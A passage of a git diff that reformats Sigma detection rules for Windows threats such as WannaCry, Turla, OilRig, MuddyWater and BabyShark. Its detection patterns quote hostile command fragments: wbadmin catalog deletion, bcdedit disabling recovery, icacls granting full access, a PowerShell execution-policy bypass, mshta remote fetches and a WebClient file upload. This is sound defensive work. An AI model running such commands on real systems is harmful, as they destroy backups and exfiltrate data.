NewProcessName|endswith: \Mc.exe + NewProcessName|endswith: \Mc.exe filter_mc: - NewProcessName|contains: + NewProcessName|contains: - \Microsoft Visual Studio - \Microsoft SDK - \Windows Kit selection_msmpeng: - NewProcessName|endswith: \MsMpEng.exe + NewProcessName|endswith: \MsMpEng.exe filter_msmpeng: - NewProcessName|contains: + NewProcessName|contains: - \Microsoft Security Client\ - \Windows Defender\ - \AntiMalware\ selection_msseces: - NewProcessName|endswith: \msseces.exe + NewProcessName|endswith: \msseces.exe filter_msseces: - NewProcessName|contains: + NewProcessName|contains: - \Microsoft Security Center\ - \Microsoft Security Client\ - \Microsoft Security Essentials\ selection_oinfo: - NewProcessName|endswith: \OInfoP11.exe + NewProcessName|endswith: \OInfoP11.exe filter_oinfo: - NewProcessName|contains: \Common Files\Microsoft Shared\ + NewProcessName|contains: \Common Files\Microsoft Shared\ selection_oleview: - NewProcessName|endswith: \OleView.exe + NewProcessName|endswith: \OleView.exe filter_oleview: - NewProcessName|contains: + NewProcessName|contains: - \Microsoft Visual Studio - \Microsoft SDK - \Windows Kit - \Windows Resource Kit\ selection_rc: - NewProcessName|endswith: \rc.exe + NewProcessName|endswith: \rc.exe filter_rc: - NewProcessName|contains: + NewProcessName|contains: - \Microsoft Visual Studio - \Microsoft SDK - \Windows Kit - \Windows Resource Kit\ - \Microsoft.NET\ - condition: process_creation and (( selection_cammute and not filter_cammute ) - or ( selection_chrome_frame and not filter_chrome_frame ) or ( selection_devemu - and not filter_devemu ) or ( selection_gadget and not filter_gadget ) or ( - selection_hcc and not filter_hcc ) or ( selection_hkcmd and not filter_hkcmd - ) or ( selection_mc and not filter_mc ) or ( selection_msmpeng and not filter_msmpeng - ) or ( selection_msseces and not filter_msseces ) or ( selection_oinfo and - not filter_oinfo ) or ( selection_oleview and not filter_oleview ) or ( selection_rc - and not filter_rc )) + condition: process_creation and (( selection_cammute and not filter_cammute ) or ( selection_chrome_frame and not filter_chrome_frame ) or ( selection_devemu and not filter_devemu ) or ( selection_gadget and not filter_gadget ) or ( selection_hcc and not filter_hcc ) or ( selection_hkcmd and not filter_hkcmd ) or ( selection_mc and not filter_mc ) or ( selection_msmpeng and not filter_msmpeng ) or ( selection_msseces and not filter_msseces ) or ( selection_oinfo and not filter_oinfo ) or ( selection_oleview and not filter_oleview ) or ( selection_rc and not filter_rc )) fields: - CommandLine - ParentCommandLine diff --git a/sigma/builtin/emerging-threats/2017/Malware/StoneDrill/win_system_apt_stonedrill.yml b/sigma/builtin/emerging-threats/2017/Malware/StoneDrill/win_system_apt_stonedrill.yml index 8bc2b3f29..500915c03 100644 --- a/sigma/builtin/emerging-threats/2017/Malware/StoneDrill/win_system_apt_stonedrill.yml +++ b/sigma/builtin/emerging-threats/2017/Malware/StoneDrill/win_system_apt_stonedrill.yml @@ -1,8 +1,7 @@ title: StoneDrill Service Install id: 9e987c6c-4c1e-40d8-bd85-dd26fba8fdd6 status: test -description: This method detects a service install of the malicious Microsoft Network - Realtime Inspection Service service described in StoneDrill report by Kaspersky +description: This method detects a service install of the malicious Microsoft Network Realtime Inspection Service service described in StoneDrill report by Kaspersky references: - https://securelist.com/blog/research/77725/from-shamoon-to-stonedrill/ author: Florian Roth (Nextron Systems) diff --git a/sigma/builtin/emerging-threats/2017/Malware/WannaCry/proc_creation_win_malware_wannacry.yml b/sigma/builtin/emerging-threats/2017/Malware/WannaCry/proc_creation_win_malware_wannacry.yml index 9207ea66e..00656f3da 100644 --- a/sigma/builtin/emerging-threats/2017/Malware/WannaCry/proc_creation_win_malware_wannacry.yml +++ b/sigma/builtin/emerging-threats/2017/Malware/WannaCry/proc_creation_win_malware_wannacry.yml @@ -4,8 +4,7 @@ status: test description: Detects WannaCry ransomware activity references: - https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100 -author: Florian Roth (Nextron Systems), Tom U. @c_APT_ure (collection), oscd.community, - Jonhnathan Ribeiro +author: Florian Roth (Nextron Systems), Tom U. @c_APT_ure (collection), oscd.community, Jonhnathan Ribeiro date: 2019/01/16 modified: 2023/02/03 tags: @@ -27,37 +26,38 @@ detection: EventID: 4688 Channel: Security selection1: - - NewProcessName|endswith: - - \tasksche.exe - - \mssecsvc.exe - - \taskdl.exe - - \taskhsvc.exe - - \taskse.exe - - \111.exe - - \lhdfrgui.exe - - \linuxnew.exe - - \wannacry.exe - - NewProcessName|contains: WanaDecryptor + - NewProcessName|endswith: + - \tasksche.exe + - \mssecsvc.exe + - \taskdl.exe + - \taskhsvc.exe + - \taskse.exe + - \111.exe + - \lhdfrgui.exe + # - '\diskpart.exe' # cannot be used in a rule of level critical + - \linuxnew.exe + - \wannacry.exe + - NewProcessName|contains: WanaDecryptor selection2: - - CommandLine|contains|all: - - icacls - - /grant - - Everyone:F - - /T - - /C - - /Q - - CommandLine|contains|all: - - bcdedit - - /set - - '{default}' - - recoveryenabled - - 'no' - - CommandLine|contains|all: - - wbadmin - - delete - - catalog - - -quiet - - CommandLine|contains: '@Please_Read_Me@.txt' + - CommandLine|contains|all: + - icacls + - /grant + - Everyone:F + - /T + - /C + - /Q + - CommandLine|contains|all: + - bcdedit + - /set + - '{default}' + - recoveryenabled + - no + - CommandLine|contains|all: + - wbadmin + - delete + - catalog + - -quiet + - CommandLine|contains: '@Please_Read_Me@.txt' condition: process_creation and (1 of selection*) fields: - CommandLine diff --git a/sigma/builtin/emerging-threats/2017/TA/APT10/proc_creation_win_apt_apt10_cloud_hopper.yml b/sigma/builtin/emerging-threats/2017/TA/APT10/proc_creation_win_apt_apt10_cloud_hopper.yml index 5ddb99ed3..c0ca40cf5 100644 --- a/sigma/builtin/emerging-threats/2017/TA/APT10/proc_creation_win_apt_apt10_cloud_hopper.yml +++ b/sigma/builtin/emerging-threats/2017/TA/APT10/proc_creation_win_apt_apt10_cloud_hopper.yml @@ -1,8 +1,7 @@ title: Potential APT10 Cloud Hopper Activity id: 966e4016-627f-44f7-8341-f394905c361f status: test -description: Detects potential process and execution activity related to APT10 Cloud - Hopper operation +description: Detects potential process and execution activity related to APT10 Cloud Hopper operation references: - https://web.archive.org/web/20180725233601/https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf author: Florian Roth (Nextron Systems) @@ -21,10 +20,10 @@ detection: EventID: 4688 Channel: Security selection_cscript: - CommandLine|contains: '.vbs /shell ' - NewProcessName|endswith: \cscript.exe + CommandLine|contains: '.vbs /shell ' + NewProcessName|endswith: \cscript.exe selection_csvde: - CommandLine|contains|all: + CommandLine|contains|all: - csvde -f C:\windows\web\ - .log condition: process_creation and (1 of selection_*) diff --git a/sigma/builtin/emerging-threats/2017/TA/Dragonfly/proc_creation_win_apt_ta17_293a_ps.yml b/sigma/builtin/emerging-threats/2017/TA/Dragonfly/proc_creation_win_apt_ta17_293a_ps.yml index 38a045865..7464fa4f8 100644 --- a/sigma/builtin/emerging-threats/2017/TA/Dragonfly/proc_creation_win_apt_ta17_293a_ps.yml +++ b/sigma/builtin/emerging-threats/2017/TA/Dragonfly/proc_creation_win_apt_ta17_293a_ps.yml @@ -1,8 +1,7 @@ title: Ps.exe Renamed SysInternals Tool id: 18da1007-3f26-470f-875d-f77faf1cab31 status: test -description: Detects renamed SysInternals tool execution with a binary named ps.exe - as used by Dragonfly APT group and documented in TA17-293A report +description: Detects renamed SysInternals tool execution with a binary named ps.exe as used by Dragonfly APT group and documented in TA17-293A report references: - https://www.us-cert.gov/ncas/alerts/TA17-293A author: Florian Roth (Nextron Systems) @@ -22,7 +21,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - ps.exe -accepteula - -s cmd /c netstat condition: process_creation and selection diff --git a/sigma/builtin/emerging-threats/2017/TA/Lazarus/proc_creation_win_apt_lazarus_binary_masquerading.yml b/sigma/builtin/emerging-threats/2017/TA/Lazarus/proc_creation_win_apt_lazarus_binary_masquerading.yml index a10b5337a..d20bd4338 100644 --- a/sigma/builtin/emerging-threats/2017/TA/Lazarus/proc_creation_win_apt_lazarus_binary_masquerading.yml +++ b/sigma/builtin/emerging-threats/2017/TA/Lazarus/proc_creation_win_apt_lazarus_binary_masquerading.yml @@ -1,8 +1,7 @@ title: Lazarus System Binary Masquerading id: 3f7f5b0b-5b16-476c-a85f-ab477f6dd24b status: test -description: Detects binaries used by the Lazarus group which use system names but - are executed and launched from non-default location +description: Detects binaries used by the Lazarus group which use system names but are executed and launched from non-default location references: - https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180244/Lazarus_Under_The_Hood_PDF_final.pdf author: Trent Liffick (@tliffick), Bartlomiej Czyz (@bczyz1) @@ -20,11 +19,11 @@ detection: EventID: 4688 Channel: Security selection: - NewProcessName|endswith: + NewProcessName|endswith: - \msdtc.exe - \gpsvc.exe filter: - NewProcessName|startswith: + NewProcessName|startswith: - C:\Windows\System32\ - C:\Windows\SysWOW64\ condition: process_creation and (selection and not filter) diff --git a/sigma/builtin/emerging-threats/2017/TA/Turla/win_system_apt_carbonpaper_turla.yml b/sigma/builtin/emerging-threats/2017/TA/Turla/win_system_apt_carbonpaper_turla.yml index d6f536ded..aa7b7a3a4 100644 --- a/sigma/builtin/emerging-threats/2017/TA/Turla/win_system_apt_carbonpaper_turla.yml +++ b/sigma/builtin/emerging-threats/2017/TA/Turla/win_system_apt_carbonpaper_turla.yml @@ -1,8 +1,7 @@ title: Turla Service Install id: 1df8b3da-b0ac-4d8a-b7c7-6cb7c24160e4 status: test -description: This method detects a service install of malicious services mentioned - in Carbon Paper - Turla report by ESET +description: This method detects a service install of malicious services mentioned in Carbon Paper - Turla report by ESET references: - https://www.welivesecurity.com/2017/03/30/carbon-paper-peering-turlas-second-stage-backdoor/ author: Florian Roth (Nextron Systems) diff --git a/sigma/builtin/emerging-threats/2017/TA/Turla/win_system_apt_turla_service_png.yml b/sigma/builtin/emerging-threats/2017/TA/Turla/win_system_apt_turla_service_png.yml index a56ab7663..47e6633a7 100644 --- a/sigma/builtin/emerging-threats/2017/TA/Turla/win_system_apt_turla_service_png.yml +++ b/sigma/builtin/emerging-threats/2017/TA/Turla/win_system_apt_turla_service_png.yml @@ -1,8 +1,7 @@ title: Turla PNG Dropper Service id: 1228f8e2-7e79-4dea-b0ad-c91f1d5016c1 status: test -description: This method detects malicious services mentioned in Turla PNG dropper - report by NCC Group in November 2018 +description: This method detects malicious services mentioned in Turla PNG dropper report by NCC Group in November 2018 references: - https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/november/turla-png-dropper-is-back/ author: Florian Roth (Nextron Systems) diff --git a/sigma/builtin/emerging-threats/2018/Malware/Elise-Backdoor/proc_creation_win_malware_elise.yml b/sigma/builtin/emerging-threats/2018/Malware/Elise-Backdoor/proc_creation_win_malware_elise.yml index dd582557d..57766516e 100644 --- a/sigma/builtin/emerging-threats/2018/Malware/Elise-Backdoor/proc_creation_win_malware_elise.yml +++ b/sigma/builtin/emerging-threats/2018/Malware/Elise-Backdoor/proc_creation_win_malware_elise.yml @@ -23,17 +23,17 @@ detection: EventID: 4688 Channel: Security selection_other_svchost: - NewProcessName|endswith: \Microsoft\Network\svchost.exe + NewProcessName|endswith: \Microsoft\Network\svchost.exe selection_other_del: - CommandLine|contains|all: + CommandLine|contains|all: - \Windows\Caches\NavShExt.dll - /c del selection_dll_path: - CommandLine|endswith: + CommandLine|endswith: - \AppData\Roaming\MICROS~1\Windows\Caches\NavShExt.dll - \AppData\Roaming\Microsoft\Windows\Caches\NavShExt.dll selection_dll_function: - CommandLine|contains: ',Setting' + CommandLine|contains: ',Setting' condition: process_creation and (1 of selection_other_* or all of selection_dll_*) falsepositives: - Unlikely diff --git a/sigma/builtin/emerging-threats/2018/TA/APT27/proc_creation_win_apt_apt27_emissary_panda.yml b/sigma/builtin/emerging-threats/2018/TA/APT27/proc_creation_win_apt_apt27_emissary_panda.yml index d4c2134f8..8faf6d754 100644 --- a/sigma/builtin/emerging-threats/2018/TA/APT27/proc_creation_win_apt_apt27_emissary_panda.yml +++ b/sigma/builtin/emerging-threats/2018/TA/APT27/proc_creation_win_apt_apt27_emissary_panda.yml @@ -1,8 +1,7 @@ title: APT27 - Emissary Panda Activity id: 9aa01d62-7667-4d3b-acb8-8cb5103e2014 status: test -description: Detects the execution of DLL side-loading malware used by threat group - Emissary Panda aka APT27 +description: Detects the execution of DLL side-loading malware used by threat group Emissary Panda aka APT27 references: - https://app.any.run/tasks/579e7587-f09d-4aae-8b07-472833262965 - https://twitter.com/cyb3rops/status/1168863899531132929 @@ -24,11 +23,11 @@ detection: Channel: Security selection_sllauncher: ParentProcessName|endswith: \sllauncher.exe - NewProcessName|endswith: \svchost.exe + NewProcessName|endswith: \svchost.exe selection_svchost: - CommandLine|contains: -k + CommandLine|contains: -k ParentProcessName|contains: \AppData\Roaming\ - NewProcessName|endswith: \svchost.exe + NewProcessName|endswith: \svchost.exe condition: process_creation and (1 of selection_*) falsepositives: - Unlikely diff --git a/sigma/builtin/emerging-threats/2018/TA/APT28/proc_creation_win_apt_sofacy.yml b/sigma/builtin/emerging-threats/2018/TA/APT28/proc_creation_win_apt_sofacy.yml index c3ce3a0fd..53137427f 100644 --- a/sigma/builtin/emerging-threats/2018/TA/APT28/proc_creation_win_apt_sofacy.yml +++ b/sigma/builtin/emerging-threats/2018/TA/APT28/proc_creation_win_apt_sofacy.yml @@ -25,18 +25,18 @@ detection: EventID: 4688 Channel: Security selection_path: - CommandLine|contains: + CommandLine|contains: - '%LOCALAPPDATA%' - \AppData\Local\ - NewProcessName|endswith: \rundll32.exe + NewProcessName|endswith: \rundll32.exe selection_extensions: - - CommandLine|contains: .dat", - - CommandLine|endswith: - - '.dll #1' - - '.dll" #1' - - .dll",#1 + - CommandLine|contains: .dat", + - CommandLine|endswith: + - '.dll #1' + - '.dll" #1' + - .dll",#1 filter_main_exclude_temp: - CommandLine|contains: \AppData\Local\Temp\ + CommandLine|contains: \AppData\Local\Temp\ condition: process_creation and (all of selection_* and not 1 of filter_main_*) falsepositives: - Unknown diff --git a/sigma/builtin/emerging-threats/2018/TA/APT29-CozyBear/proc_creation_win_apt_apt29_phishing_campaign_indicators.yml b/sigma/builtin/emerging-threats/2018/TA/APT29-CozyBear/proc_creation_win_apt_apt29_phishing_campaign_indicators.yml index 60cc039e3..eaf3596f7 100644 --- a/sigma/builtin/emerging-threats/2018/TA/APT29-CozyBear/proc_creation_win_apt_apt29_phishing_campaign_indicators.yml +++ b/sigma/builtin/emerging-threats/2018/TA/APT29-CozyBear/proc_creation_win_apt_apt29_phishing_campaign_indicators.yml @@ -1,11 +1,10 @@ title: APT29 2018 Phishing Campaign CommandLine Indicators id: 7453575c-a747-40b9-839b-125a0aae324b related: - - id: 033fe7d6-66d1-4240-ac6b-28908009c71f - type: obsoletes + - id: 033fe7d6-66d1-4240-ac6b-28908009c71f + type: obsoletes status: stable -description: Detects indicators of APT 29 (Cozy Bear) phishing-campaign as reported - by mandiant +description: Detects indicators of APT 29 (Cozy Bear) phishing-campaign as reported by mandiant references: - https://twitter.com/DrunkBinary/status/1063075530180886529 - https://www.microsoft.com/security/blog/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/ @@ -25,10 +24,10 @@ detection: EventID: 4688 Channel: Security selection: - - CommandLine|contains: -noni -ep bypass $ - - CommandLine|contains|all: - - cyzfc.dat, - - PointFunctionCall + - CommandLine|contains: -noni -ep bypass $ + - CommandLine|contains|all: + - cyzfc.dat, + - PointFunctionCall condition: process_creation and selection falsepositives: - Unlikely diff --git a/sigma/builtin/emerging-threats/2018/TA/MuddyWater/proc_creation_win_apt_muddywater_activity.yml b/sigma/builtin/emerging-threats/2018/TA/MuddyWater/proc_creation_win_apt_muddywater_activity.yml index 8b3523f31..fe8c82050 100644 --- a/sigma/builtin/emerging-threats/2018/TA/MuddyWater/proc_creation_win_apt_muddywater_activity.yml +++ b/sigma/builtin/emerging-threats/2018/TA/MuddyWater/proc_creation_win_apt_muddywater_activity.yml @@ -19,19 +19,19 @@ detection: EventID: 4688 Channel: Security selection_mshta: - CommandLine|contains|all: + CommandLine|contains|all: - vbscript:Close(Execute("CreateObject( - powershell - -w 1 -exec Bypass - \ProgramData\ selection_survey: - CommandLine|contains|all: + CommandLine|contains|all: - Win32_OperatingSystem - Win32_NetworkAdapterConfiguration - root\SecurityCenter2 - '[System.Net.DNS]' selection_pwsh_backdoor: - CommandLine|contains|all: + CommandLine|contains|all: - '[Convert]::ToBase64String' - '[System.Text.Encoding]::UTF8.GetString]' - GetResponse().GetResponseStream() diff --git a/sigma/builtin/emerging-threats/2018/TA/OilRig/proc_creation_win_apt_oilrig_mar18.yml b/sigma/builtin/emerging-threats/2018/TA/OilRig/proc_creation_win_apt_oilrig_mar18.yml index f17b72dc4..643823ade 100644 --- a/sigma/builtin/emerging-threats/2018/TA/OilRig/proc_creation_win_apt_oilrig_mar18.yml +++ b/sigma/builtin/emerging-threats/2018/TA/OilRig/proc_creation_win_apt_oilrig_mar18.yml @@ -1,18 +1,17 @@ title: OilRig APT Activity id: ce6e34ca-966d-41c9-8d93-5b06c8b97a06 related: - - id: 53ba33fd-3a50-4468-a5ef-c583635cfa92 - type: similar - - id: c0580559-a6bd-4ef6-b9b7-83703d98b561 - type: similar - - id: 7bdf2a7c-3acc-4091-9581-0a77dad1c5b5 - type: similar + - id: 53ba33fd-3a50-4468-a5ef-c583635cfa92 # System + type: similar + - id: c0580559-a6bd-4ef6-b9b7-83703d98b561 # Security + type: similar + - id: 7bdf2a7c-3acc-4091-9581-0a77dad1c5b5 # Registry + type: similar status: test description: Detects OilRig activity as reported by Nyotron in their March 2018 report references: - https://web.archive.org/web/20180402134442/https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018C.pdf -author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, - oscd.community +author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community date: 2018/03/23 modified: 2023/03/08 tags: @@ -34,19 +33,19 @@ detection: EventID: 4688 Channel: Security selection_schtasks: - CommandLine|contains|all: + CommandLine|contains|all: - SC Scheduled Scan - \microsoft\Taskbar\autoit3.exe selection_temp: - NewProcessName|contains: \Windows\Temp\DB\ - NewProcessName|endswith: .exe + NewProcessName|contains: \Windows\Temp\DB\ + NewProcessName|endswith: .exe selection_service: - CommandLine|contains: + CommandLine|contains: - i - u - NewProcessName: C:\Windows\system32\Service.exe + NewProcessName: C:\Windows\system32\Service.exe selection_autoit: - CommandLine|contains|all: + CommandLine|contains|all: - nslookup.exe - -q=TXT ParentProcessName|endswith: \local\microsoft\Taskbar\autoit3.exe diff --git a/sigma/builtin/emerging-threats/2018/TA/OilRig/win_security_apt_oilrig_mar18.yml b/sigma/builtin/emerging-threats/2018/TA/OilRig/win_security_apt_oilrig_mar18.yml index b29644850..ebee13389 100644 --- a/sigma/builtin/emerging-threats/2018/TA/OilRig/win_security_apt_oilrig_mar18.yml +++ b/sigma/builtin/emerging-threats/2018/TA/OilRig/win_security_apt_oilrig_mar18.yml @@ -1,19 +1,17 @@ title: OilRig APT Schedule Task Persistence - Security id: c0580559-a6bd-4ef6-b9b7-83703d98b561 related: - - id: 53ba33fd-3a50-4468-a5ef-c583635cfa92 - type: similar - - id: 7bdf2a7c-3acc-4091-9581-0a77dad1c5b5 - type: similar - - id: ce6e34ca-966d-41c9-8d93-5b06c8b97a06 - type: similar + - id: 53ba33fd-3a50-4468-a5ef-c583635cfa92 # System + type: similar + - id: 7bdf2a7c-3acc-4091-9581-0a77dad1c5b5 # Registry + type: similar + - id: ce6e34ca-966d-41c9-8d93-5b06c8b97a06 # ProcessCreation + type: similar status: test -description: Detects OilRig schedule task persistence as reported by Nyotron in their - March 2018 report +description: Detects OilRig schedule task persistence as reported by Nyotron in their March 2018 report references: - https://web.archive.org/web/20180402134442/https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018C.pdf -author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, - oscd.community +author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community date: 2018/03/23 modified: 2023/03/08 tags: diff --git a/sigma/builtin/emerging-threats/2018/TA/OilRig/win_system_apt_oilrig_mar18.yml b/sigma/builtin/emerging-threats/2018/TA/OilRig/win_system_apt_oilrig_mar18.yml index b7005f6d8..608674039 100644 --- a/sigma/builtin/emerging-threats/2018/TA/OilRig/win_system_apt_oilrig_mar18.yml +++ b/sigma/builtin/emerging-threats/2018/TA/OilRig/win_system_apt_oilrig_mar18.yml @@ -1,19 +1,17 @@ title: OilRig APT Schedule Task Persistence - System id: 53ba33fd-3a50-4468-a5ef-c583635cfa92 related: - - id: c0580559-a6bd-4ef6-b9b7-83703d98b561 - type: similar - - id: 7bdf2a7c-3acc-4091-9581-0a77dad1c5b5 - type: similar - - id: ce6e34ca-966d-41c9-8d93-5b06c8b97a06 - type: similar + - id: c0580559-a6bd-4ef6-b9b7-83703d98b561 # Security + type: similar + - id: 7bdf2a7c-3acc-4091-9581-0a77dad1c5b5 # Registry + type: similar + - id: ce6e34ca-966d-41c9-8d93-5b06c8b97a06 # ProcessCreation + type: similar status: experimental -description: Detects OilRig schedule task persistence as reported by Nyotron in their - March 2018 report +description: Detects OilRig schedule task persistence as reported by Nyotron in their March 2018 report references: - https://web.archive.org/web/20180402134442/https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018C.pdf -author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, - oscd.community +author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community date: 2018/03/23 modified: 2023/03/08 tags: diff --git a/sigma/builtin/emerging-threats/2018/TA/Slingshot/proc_creation_win_apt_slingshot.yml b/sigma/builtin/emerging-threats/2018/TA/Slingshot/proc_creation_win_apt_slingshot.yml index b59101b64..ca39ec945 100644 --- a/sigma/builtin/emerging-threats/2018/TA/Slingshot/proc_creation_win_apt_slingshot.yml +++ b/sigma/builtin/emerging-threats/2018/TA/Slingshot/proc_creation_win_apt_slingshot.yml @@ -1,8 +1,7 @@ title: Defrag Deactivation id: 958d81aa-8566-4cea-a565-59ccd4df27b0 status: test -description: Detects the deactivation and disabling of the Scheduled defragmentation - task as seen by Slingshot APT group +description: Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group references: - https://securelist.com/apt-slingshot/84312/ author: Florian Roth (Nextron Systems), Bartlomiej Czyz (@bczyz1) @@ -21,13 +20,13 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - /delete - /change - CommandLine|contains|all: + CommandLine|contains|all: - /TN - \Microsoft\Windows\Defrag\ScheduledDefrag - NewProcessName|endswith: \schtasks.exe + NewProcessName|endswith: \schtasks.exe condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/emerging-threats/2018/TA/Slingshot/win_security_apt_slingshot.yml b/sigma/builtin/emerging-threats/2018/TA/Slingshot/win_security_apt_slingshot.yml index 9df4cb0b8..f50398291 100644 --- a/sigma/builtin/emerging-threats/2018/TA/Slingshot/win_security_apt_slingshot.yml +++ b/sigma/builtin/emerging-threats/2018/TA/Slingshot/win_security_apt_slingshot.yml @@ -1,11 +1,10 @@ title: Defrag Deactivation - Security id: c5a178bf-9cfb-4340-b584-e4df39b6a3e7 related: - - id: 958d81aa-8566-4cea-a565-59ccd4df27b0 - type: derived + - id: 958d81aa-8566-4cea-a565-59ccd4df27b0 + type: derived status: test -description: Detects the deactivation and disabling of the Scheduled defragmentation - task as seen by Slingshot APT group +description: Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group references: - https://securelist.com/apt-slingshot/84312/ author: Florian Roth (Nextron Systems), Bartlomiej Czyz (@bczyz1) diff --git a/sigma/builtin/emerging-threats/2018/TA/TropicTrooper/proc_creation_win_apt_tropictrooper.yml b/sigma/builtin/emerging-threats/2018/TA/TropicTrooper/proc_creation_win_apt_tropictrooper.yml index 2df07b072..a44892193 100644 --- a/sigma/builtin/emerging-threats/2018/TA/TropicTrooper/proc_creation_win_apt_tropictrooper.yml +++ b/sigma/builtin/emerging-threats/2018/TA/TropicTrooper/proc_creation_win_apt_tropictrooper.yml @@ -1,8 +1,7 @@ title: TropicTrooper Campaign November 2018 id: 8c7090c3-e0a0-4944-bd08-08c3a0cecf79 status: stable -description: Detects TropicTrooper activity, an actor who targeted high-profile organizations - in the energy and food and beverage sectors in Asia +description: Detects TropicTrooper activity, an actor who targeted high-profile organizations in the energy and food and beverage sectors in Asia references: - https://www.microsoft.com/en-us/security/blog/2018/11/28/windows-defender-atp-device-risk-score-exposes-new-cyberattack-drives-conditional-access-to-protect-networks/ author: '@41thexplorer, Microsoft Defender ATP' @@ -20,7 +19,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: abCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCc + CommandLine|contains: abCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCc condition: process_creation and selection level: high ruletype: Sigma diff --git a/sigma/builtin/emerging-threats/2019/Exploits/BearLPE-Exploit/proc_creation_win_exploit_other_bearlpe.yml b/sigma/builtin/emerging-threats/2019/Exploits/BearLPE-Exploit/proc_creation_win_exploit_other_bearlpe.yml index c0de09e81..7fe19772e 100644 --- a/sigma/builtin/emerging-threats/2019/Exploits/BearLPE-Exploit/proc_creation_win_exploit_other_bearlpe.yml +++ b/sigma/builtin/emerging-threats/2019/Exploits/BearLPE-Exploit/proc_creation_win_exploit_other_bearlpe.yml @@ -1,8 +1,7 @@ title: Potential BearLPE Exploitation id: 931b6802-d6a6-4267-9ffa-526f57f22aaf status: test -description: Detects potential exploitation of the BearLPE exploit using Task Scheduler - ".job" import arbitrary DACL write\par +description: Detects potential exploitation of the BearLPE exploit using Task Scheduler ".job" import arbitrary DACL write\par references: - https://github.com/djhohnstein/polarbearrepo/blob/f26d3e008093cc5c835e92a7165170baf6713d43/bearlpe/polarbear/polarbear/exploit.cpp author: Olaf Hartong @@ -21,10 +20,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \schtasks.exe - - OriginalFileName: schtasks.exe + - NewProcessName|endswith: \schtasks.exe + - OriginalFileName: schtasks.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - /change - /TN - /RU diff --git a/sigma/builtin/emerging-threats/2019/Exploits/CVE-2019-1388/proc_creation_win_exploit_cve_2019_1388.yml b/sigma/builtin/emerging-threats/2019/Exploits/CVE-2019-1388/proc_creation_win_exploit_cve_2019_1388.yml index 8f316ab30..f51deb85f 100644 --- a/sigma/builtin/emerging-threats/2019/Exploits/CVE-2019-1388/proc_creation_win_exploit_cve_2019_1388.yml +++ b/sigma/builtin/emerging-threats/2019/Exploits/CVE-2019-1388/proc_creation_win_exploit_cve_2019_1388.yml @@ -1,8 +1,7 @@ title: Exploiting CVE-2019-1388 id: 02e0b2ea-a597-428e-b04a-af6a1a403e5c status: stable -description: Detects an exploitation attempt in which the UAC consent dialogue is - used to invoke an Internet Explorer process running as LOCAL_SYSTEM +description: Detects an exploitation attempt in which the UAC consent dialogue is used to invoke an Internet Explorer process running as LOCAL_SYSTEM references: - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1388 - https://www.zerodayinitiative.com/blog/2019/11/19/thanksgiving-treat-easy-as-pie-windows-7-secure-desktop-escalation-of-privilege @@ -22,13 +21,13 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: ' http' + CommandLine|contains: ' http' ParentProcessName|endswith: \consent.exe - NewProcessName|endswith: \iexplore.exe + NewProcessName|endswith: \iexplore.exe rights1: MandatoryLabel: S-1-16-16384 rights2: - SubjectUserName|contains: + SubjectUserName|contains: # covers many language settings - AUTHORI - AUTORI condition: process_creation and (selection and ( rights1 or rights2 )) diff --git a/sigma/builtin/emerging-threats/2019/Malware/BabyShark/proc_creation_win_malware_babyshark.yml b/sigma/builtin/emerging-threats/2019/Malware/BabyShark/proc_creation_win_malware_babyshark.yml index 05c2aa751..6f56ab7b3 100644 --- a/sigma/builtin/emerging-threats/2019/Malware/BabyShark/proc_creation_win_malware_babyshark.yml +++ b/sigma/builtin/emerging-threats/2019/Malware/BabyShark/proc_creation_win_malware_babyshark.yml @@ -24,14 +24,13 @@ detection: EventID: 4688 Channel: Security selection: - - CommandLine|contains|all: - - powershell.exe mshta.exe http - - .hta - - CommandLine|contains: - - reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server - Client\Default" - - cmd.exe /c taskkill /im cmd.exe - - (New-Object System.Net.WebClient).UploadFile('http + - CommandLine|contains|all: + - powershell.exe mshta.exe http + - .hta + - CommandLine|contains: + - reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" + - cmd.exe /c taskkill /im cmd.exe + - (New-Object System.Net.WebClient).UploadFile('http condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/emerging-threats/2019/Malware/Dridex/proc_creation_win_malware_dridex.yml b/sigma/builtin/emerging-threats/2019/Malware/Dridex/proc_creation_win_malware_dridex.yml index 823efd167..17f16035e 100644 --- a/sigma/builtin/emerging-threats/2019/Malware/Dridex/proc_creation_win_malware_dridex.yml +++ 